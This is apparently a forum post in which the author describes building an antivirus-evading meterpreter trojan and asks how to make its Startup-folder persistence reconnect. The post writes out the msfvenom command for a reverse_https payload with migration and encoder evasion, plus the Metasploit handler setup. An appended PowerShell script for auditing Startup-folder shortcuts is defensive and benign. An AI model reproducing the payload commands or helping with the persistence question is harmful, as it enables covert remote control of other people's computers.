So I've created an .exe using reverse_https meterpreter shell code and it's undetectable. However, all of meterpreter's persistence methods resulted in the AV going off, so I decided to use NSIS to make an installer for my trojan. This does get detected by a few AVs, but it's as close to undetectable as I could get and still have persistence. It copies the .exe somewhere else and creates a shortcut in the user's startup folder so that the .exe is run upon sign-in. However, meterpreter does not start a new session when the session is lost, and upon sign-in, nothing happens. The old session is still open, but unresponsive. I know that the .exe is run upon log-in because when I manually close the session and then listen, it will pick up a new session.
How do I maintain access using the shortcut method? Also, is there a better way to maintain persistence without NSIS? Using NSIS seems silly. I want the .exe to immediately have persistence without connecting back and then having metasploit tell it to do something.
Here is the shell code that I'm using:
msfvenom -p windows/meterpreter/reverse_https lhost=xxxx lport=xxxx PrepenMigrate=true PrependMigrateProc=svhost.exe -b '\x00\xff' -e x86/shikata_ga_nai -i 3 -f c
This is what I type when I start metasploit on Kali:
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set SessionCommunicationTimeout 0
exploit
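The mechanism the question relies on (a shortcut dropped in the user's Startup folder so the executable runs at every sign-in) is also what a defender looks for when auditing a host. As an added example that is not part of the original post, the PowerShell below enumerates the per-user and all-users Startup folders, resolves each .lnk to its target, and flags targets that live outside Program Files or the Windows directory, which is where a copied-elsewhere executable like the one described would show up. The folder names come from the .NET Environment.SpecialFolder enumeration and the WScript.Shell COM object; the "trusted roots" list is an assumption for this example, not a rule.

```powershell
# Added example (not from the original post): audit Startup-folder shortcuts.
$shell = New-Object -ComObject WScript.Shell
$startupDirs = @(
    [Environment]::GetFolderPath('Startup'),        # per-user Startup folder
    [Environment]::GetFolderPath('CommonStartup')   # all-users Startup folder
)
# Assumed "expected" locations for auto-start targets; tune for your environment.
$trustedRoots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:SystemRoot) |
    Where-Object { $_ }

$results = foreach ($dir in $startupDirs) {
    foreach ($file in Get-ChildItem -Path $dir -Filter *.lnk -ErrorAction SilentlyContinue) {
        # CreateShortcut on an existing .lnk returns its properties without modifying it.
        $lnk    = $shell.CreateShortcut($file.FullName)
        $target = $lnk.TargetPath
        $inTrusted = $false
        foreach ($root in $trustedRoots) {
            if ($target -like "$root\*") { $inTrusted = $true }
        }
        [pscustomobject]@{
            Shortcut  = $file.FullName
            Target    = $target
            Arguments = $lnk.Arguments
            Created   = $file.CreationTime
            Flag      = if ($inTrusted) { '' } else { 'target outside Program Files / Windows' }
        }
    }
}
# Newest shortcuts first: a recently created entry with an unusual target is the
# thing worth looking at.
$results | Sort-Object Created -Descending | Format-Table -AutoSize
```

Run it in a normal user session to see that user's Startup folder; the all-users folder is read from the same run. A flagged row is a lead, not a verdict: follow it up by checking the target's signature and hash with Get-AuthenticodeSignature and Get-FileHash.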